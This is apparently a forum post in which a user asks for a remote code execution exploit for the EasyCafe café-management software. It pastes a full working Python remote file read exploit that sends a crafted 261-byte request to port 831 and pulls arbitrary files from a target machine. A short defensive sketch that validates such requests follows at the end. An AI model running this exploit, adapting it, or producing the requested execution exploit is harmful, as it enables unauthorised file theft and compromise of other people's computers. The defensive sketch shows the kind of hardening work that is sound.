EasyCafe exploit need

whobornin1990

HDD-drive
User
Registered
19.07.2020
Messages
42
Reactions
-1
Hello everyone, if you know the software EasyCafe from TINASOFT ( http://www.tinasoft.com/Download/easysetup.exe )! I need an exploit made in Python or any! The exploit must REMOTE FILE EXECUTE from client side PC! The software is very old, more than 15 years, and also there is an exploit, just for REMOTE FILE READ from client side!
Python:
#!/usr/bin/python -w
# Title : EasyCafe Server <= 2.2.14 Remote File Read
# Date : 25/12/2015
# Author : R-73eN
# Tested on : Windows 7 Ultimate
# Software Link : http://www.tinasoft.com/easycafe/
# Download Link: http://www.tinasoft.com/Download/easysetup.exe
# Vulnerable Versions : EasyCafe Server <= 2.2.14
# EasyCafe Server has a feature to upload a file from the server to a client.
# And the request is as following. EasyCafe Server sends a UDP request to the client with the file that it wants to upload,
# Then the client receives the packet and connects to the server on port 831 and sends the directory of the file and receives it.
# The problem is that a remote attacker can connect to port 831 and can retrieve a file because the server doesn't validate the request,
# and does not check if it has sent the UDP request which gives us full Read access to the system.
#
#EDB Note: Code may need some adjusting

import socket

#Banner
banner = ""
banner += "  ___        __        ____                 _    _  \n"
banner +=" |_ _|_ __  / _| ___  / ___| ___ _ __      / \  | |    \n"
banner +="  | || '_ \| |_ / _ \| |  _ / _ \ '_ \    / _ \ | |    \n"
banner +="  | || | | |  _| (_) | |_| |  __/ | | |  / ___ \| |___ \n"
banner +=" |___|_| |_|_|  \___/ \____|\___|_| |_| /_/   \_\_____|\n\n"
print banner

IP = "192.168.43.36" # Target IP
PORT = 831
file_to_read = "C:\\Windows\\System32\\drivers\\etc\\hosts" # File to read

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((IP, PORT))
file_to_read = "\x43" + file_to_read
hex_value = ''.join(x.encode('hex') for x in file_to_read)
fill = "\x00"
end = "\x01\x00\x00\x00\x01"
payload = hex_value.decode("hex") + fill * (261 - len(end) - len(file_to_read)) + end
s.send(payload)
s.settimeout(0)
print "[+] Request Send Waiting for Response . . . [+]"

try:
    data = s.recv(261) # Get header
    while data:
        data = s.recv(2048)
        print data

except Exception:
    print "[+] https://www.infogen.al/ [+]"
finally:
    s.close()
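
The header comments of the script above describe the flaw as a missing check: the service on port 831 never verifies that it announced the transfer being requested. As an added example (not part of the post and not EasyCafe's code), this Python 3 sketch models that check, with the 261-byte request layout taken from the script's own request; `TransferGate`, `offer`, `authorise` and `OFFER_TTL` are hypothetical names and values.

```python
import ntpath
import time

REQ_LEN = 261                       # request size used by the script above
TRAILER = b"\x01\x00\x00\x00\x01"   # last five bytes of that request
MARKER = 0x43                       # leading byte of that request
OFFER_TTL = 30.0                    # assumption: seconds an offer stays valid


def parse_request(raw):
    """Return the requested path, or None if the frame is malformed."""
    if len(raw) != REQ_LEN or raw[0] != MARKER or not raw.endswith(TRAILER):
        return None
    field = raw[1:REQ_LEN - len(TRAILER)]
    path, _, padding = field.partition(b"\x00")
    if not path or padding.strip(b"\x00"):
        return None                 # empty path, or data hidden after the NUL
    return path.decode("latin-1")


class TransferGate:
    """Tracks files the server offered; authorises only matching requests."""

    def __init__(self, clock=time.monotonic):
        self._offers = {}           # (client_ip, normalised path) -> expiry
        self._clock = clock

    @staticmethod
    def _norm(path):
        # Windows path rules: fold case and separators, collapse ".." parts.
        return ntpath.normcase(ntpath.normpath(path))

    def offer(self, client_ip, path):
        """Record that the server sent its UDP upload notice to client_ip."""
        self._offers[(client_ip, self._norm(path))] = self._clock() + OFFER_TTL

    def authorise(self, client_ip, raw):
        """True only for a well-formed request matching a live, unused offer."""
        path = parse_request(raw)
        if path is None:
            return False
        # pop() makes every offer single-use, so a replayed request fails.
        expiry = self._offers.pop((client_ip, self._norm(path)), None)
        return expiry is not None and self._clock() <= expiry
```

A connection to port 831 that fails `authorise` is exactly the unsolicited request the advisory text describes, so it is also the event worth logging and alerting on.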